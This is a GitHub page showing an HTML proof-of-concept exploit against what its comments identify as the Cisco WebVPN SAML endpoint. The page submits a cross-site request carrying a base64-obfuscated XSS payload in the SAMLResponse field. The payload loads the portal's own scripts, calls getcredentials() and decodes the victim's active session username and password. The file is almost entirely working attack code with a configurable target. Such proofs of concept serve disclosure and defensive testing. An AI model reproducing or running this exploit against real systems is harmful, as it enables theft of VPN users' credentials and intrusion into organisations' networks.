-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathuser_password_xss.html
29 lines (29 loc) · 1.27 KB
/
user_password_xss.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<!DOCTYPE html>
<html lang="en">
<head></head>
<body>
<form id="csrf" action="" method="POST">
<input id="SAMLResponse" name="SAMLResponse" value=''>
<input type="submit" value="XSS">
</form>
<script>
target = "https://localhost"; // Change me
form = document.getElementById("csrf");
form.action = target + "/+CSCOE+/saml/sp/acs?tgname=a";
payload = `
submit_saml = function() {}; //Prevent page from redirecting to logon.html causing the sesison to clear.
s = document.createElement("script");
s.src = "`+ target + `/+CSCOE+/common.js"; // Cisco string utilities: hex_2_ascii & rot13.
document.body.appendChild(s);
s = document.createElement("script");
s.src = "` + target + `/+CSCOE+/appstart.js"; // Utilities leaking active session credentials via getcredentials().
document.body.appendChild(s);
document.onreadystatechange = function() {
creds = getcredentials();
alert(rot13(hex_2_ascii(creds.split('/')[0].split('=')[1])) + ":" + rot13(hex_2_ascii(creds.split('/')[1].split('=')[1])));
}`;
saml = document.getElementById('SAMLResponse');
saml.value = '"><svg/onload=eval(atob("' + btoa(payload) + '"))>';
</script>
</body>
</html>